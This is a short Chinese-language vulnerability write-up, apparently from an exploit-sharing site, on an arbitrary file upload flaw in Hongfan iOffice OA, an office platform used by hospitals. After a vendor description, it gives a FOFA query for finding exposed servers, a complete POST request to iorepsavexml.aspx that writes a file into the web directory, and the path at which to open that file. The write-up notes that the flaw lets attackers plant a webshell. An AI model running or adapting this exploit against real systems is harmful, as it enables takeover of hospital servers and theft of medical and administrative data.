漏洞描述

广州红帆科技深耕医疗行业20余年，专注医院行政管控，与企业微信、阿里钉钉全方位结合，推出web移动一体化办公解决方案——iOffice20（医微云）。提供行政办公、专业科室应用、决策辅助等信息化工具，采取平台化管理模式，取代医疗机构过往多系统分散式管理，实现医院内各科室之间的快速分工合作，并通过整合各类管理应用，让医疗机构管理者随时随地把控医院的运营管理情况，同时为行政管理人员提供便捷多终端的移动协同工具，推进移动办公全面落地，深化互联网+医疗建设，成就面向医疗机构的“智慧管控”。

红帆OA 存在任意文件上传漏洞，攻击者可通过此漏洞上传webshell木马，获取服务器控制权限

 

漏洞复现

FOFA

title="iOffice.net"

POC

POST /ioffice/prg/set/report/iorepsavexml.aspx?key=writefile&filename=md.txt&filepath=/upfiles/rep/pic/ HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ASP.NET_SessionId=lcluwirkrcqj42iuxfvafoq4
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 35

poc

 

然后访问路径 /ioffice/upfiles/rep/pic/md.txt